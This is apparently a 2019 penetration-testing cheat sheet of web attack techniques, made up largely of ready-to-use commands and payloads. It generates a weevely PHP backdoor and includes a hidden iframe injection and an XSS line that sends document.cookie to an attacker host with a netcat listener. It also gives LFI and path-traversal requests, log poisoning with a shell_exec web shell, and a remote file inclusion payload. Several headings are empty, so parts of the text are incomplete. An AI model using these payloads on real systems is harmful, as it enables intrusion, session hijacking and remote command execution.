Title: Web Attacks techniques used and required in Penetration TestingAuthor: unknowndevice64

Web Shag Web Application Vulnerability Assessment Platform

Web Shells
ls -l /usr/share/webshells/

Generate a PHP backdoor (generate) protected with the given password (s3cr3t)
weevely generate s3cr3t
weevely http://$ip/weevely.php s3cr3t

Java Signed Applet Attack

HTTP / HTTPS Webserver Enumeration

OWASP Dirbuster

nikto -h $ip

Essential Iceweasel Add-ons
Cookies Manager https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/
Tamper Data

Cross Site Scripting (XSS)
significant impacts, such as cookie stealing and authentication bypass, redirecting the victim’s browser to a malicious HTML page, and more

Browser Redirection and IFRAME Injection

<iframe SRC="http://$ip/report" height = "0" width="0"></iframe>

Stealing Cookies and Session Information

new image().src="http://$ip/bogus.php?output="+document.cookie;

nc -nlvp 80

File Inclusion Vulnerabilities

Local (LFI) and remote (RFI) file inclusion vulnerabilities are commonly found in poorly written PHP code.

fimap - There is a Python tool called fimap which can be leveraged to automate the exploitation of LFI/RFI vulnerabilities that are found in PHP (sqlmap for LFI):
Gaining a shell from phpinfo()
fimap + phpinfo() Exploit - If a phpinfo() file is present, it’s usually possible to get a shell, if you don’t know the location of the phpinfo file fimap can probe for it, or you could use a tool like OWASP DirBuster.

For Local File Inclusions look for the include() function in PHP code.


LFI - Encode and Decode a file using base64

curl -s \
"http://$ip/?page=php://filter/convert.base64-encode/resource=index" \
| grep -e '\[^\\ \]\\{40,\\}' | base64 -d

LFI - Download file with base 64 encoding

LFI Linux Files:

LFI Windows Files:

LFI OSX Files:

LFI - Download passwords file

LFI - Download passwords file with filter evasion

Local File Inclusion - In versions of PHP below 5.3 we can terminate with null byte
GET /addguestbook.php?name=Haxor&comment=Merci!&LANG=../../../../../../../windows/system32/drivers/etc/hosts%00

Contaminating Log Files <?php echo shell_exec($_GET['cmd']);?>

For a Remote File Inclusion look for php code that is not sanitized and passed to the PHP include function and the php.ini file must be configured to allow remote files

/etc/php5/cgi/php.ini - "allow_url_fopen" and "allow_url_include" both set to "on"


Remote File Inclusion

<?php echo shell\_exec("ipconfig");?>

Submitted On: 2019-05-18 12:18:25